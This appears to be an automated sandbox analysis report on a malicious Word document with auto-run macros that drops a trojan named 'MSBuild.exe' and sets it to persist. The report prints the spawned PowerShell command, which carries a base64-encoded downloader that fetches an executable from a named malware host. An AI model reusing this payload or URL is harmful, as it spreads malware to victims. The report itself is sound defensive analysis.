a2cdac36...103a

Severity	Category	Operation	Classification
4/5	Process	Creates process	-
Creates process "powershell.exe /c [Byte[]]$code_ = [System.Convert]::FromBase64String('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BAAAAPYClwAAAJ8DmwAAALAAoAAAALAEpQACAAEAAwABAAIAAwACAAYABQACAAcABwABAAgABwACAAkACQAEgAAAAQAAAAAAAAAAAAAAAAAaAAAAAgAAAAAAAAAAAAAAXQAKAAAAAAACAAAAAAAAAAAAAABdAB0DAAAAAAAAAAABAAAANwQAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAVGhyZWFkAERvd25sb2FkAFN5bmNocm9uaXplZAA8RGVzdFBhdGg+a19fQmFja2luZ0ZpZWxkAGRlZmF1bHRJbnN0YW5jZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBEb3dubG9hZEZpbGUAVHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB2YWx1ZQBEb3dubG9hZC5leGUAU3lzdGVtLlRocmVhZGluZwBTdHJpbmcAR2V0Rm9sZGVyUGF0aABnZXRfRGVzdFBhdGgAc2V0X0Rlc3RQYXRoAFN5c3RlbS5Db21wb25lbnRNb2RlbABQcm9ncmFtAFN5c3RlbQByZXNvdXJjZU1hbgBNYWluAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTbGVlcABTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIALmN0b3IALmNjdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAERvd25sb2FkLlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBEb3dubG9hZC5Qcm9wZXJ0aWVzAFNldHRpbmdzAFByb2Nlc3MAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AGdldF9EZWZhdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABTdGFydABnZXRfQXNzZW1ibHkAAAAAAGloAHQAdABwADoALwAvAGEAcgBhAHMAawBhAHIAZwBvAC0AbwBuAGwAaQBuAGUALgBoAG8AcwB0AC8AZgBhAG0AaQBsAHkAcABpAGMAdAB1AHIAZQBzAC8AYQByAGEAcwAuAGUAeABlAAEZXABNAFMAQgB1AGkAbABkAC4AZQB4AGUAADtEAG8AdwBuAGwAbwBhAGQALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAAAAJNRQ1ozH8RAsq9CmJGMQnwABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAgEODgUgAQERXQQAAQEIBQABEnEOBQABDhF5BQACDg4OCAABEoCBEYCFBSAAEoCJByACAQ4SgIkIAAESgI0SgI0It3pcVhk04IkCBg4DBhJVAwYSWQMGEhADAAAOBAABAQ4DAAABBAAAElUEAAASWQUAAQESWQQAABIQAwgADgQIABJVBAgAElkECAASEAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAANAQAIRG93bmxvYWQAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQxZGJlMzY1OS00NmVjLTRkOGItODQwMC02MzViNWIzZDY3NGQAAAwBAAcxLjAuMC4wAAAEAQAAAEABADNTeXN0ZW0uUmVzb3VyY2VzLlRvb2xzLlN0cm9uZ2x5VHlwZWRSZXNvdXJjZUJ1aWxkZXIHNC4w". ... VTI Actions Go to function call
Creates process "C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe". ... VTI Actions Go to function call
Creates process "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe". ... VTI Actions Go to function call
4/5	File System	Known malicious file	Trojan
File "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe" is a known malicious file. ... VTI Actions Go to file details Go to function call
4/5	Network	Downloads data	Downloader
URL "http://araskargo-online.host/familypictures/aras.exe". ... VTI Actions Go to function call
3/5	Network	Performs DNS request	-
Resolves host name "araskargo-online.host". ... VTI Actions Go to function call
3/5	PE	Executes dropped PE file	-
Executes dropped file "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe". ... VTI Actions Go to file details Go to function call
3/5	YARA	YARA match	-
Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc" ... VTI Actions Go to YARA match
Rule "VBA_Obfuscation_ObjectName" from ruleset "Generic" has matched for "C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc" ... VTI Actions Go to YARA match
2/5	Network	Connects to HTTP server	-
URL "araskargo-online.host/familypictures/aras.exe". ... VTI Actions Go to function call
2/5	PE	Drops PE file	Dropper
Drops file "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe". ... VTI Actions Go to file details Go to function call
2/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro automatically on target "document" and event "open". ... VTI Actions Go to macro
Executes macro on target "document" and event "close". ... VTI Actions Go to macro
Executes macro on target "document" and event "new". ... VTI Actions Go to macro
Executes macro on target "document" and event "sync". ... VTI Actions Go to macro
Executes macro on target "document" and event "xmlafterinsert". ... VTI Actions Go to macro
Executes macro on target "document" and event "xmlbeforedelete". ... VTI Actions Go to macro
2/5	VBA Macro	Creates suspicious COM object	-
CreateObject(U0VFzrjFo("1%&e'*8", "fBFTjwwKL")) ... VTI Actions Go to macro
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to function call
1/5	Static	Unparsable sections in file	-
Static analyzer was unable to completely parse the analyzed file: C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc. ... VTI Actions Go to file details
1/5	Static	Contains suspicious meta data	-
Office document contains below average content data. ... VTI Actions Go to file details
1/5	VBA Macro	Contains Office macro	-
Office document contains a VBA macro. ... VTI Actions Go to file details

Notifications (2/2)

Before

After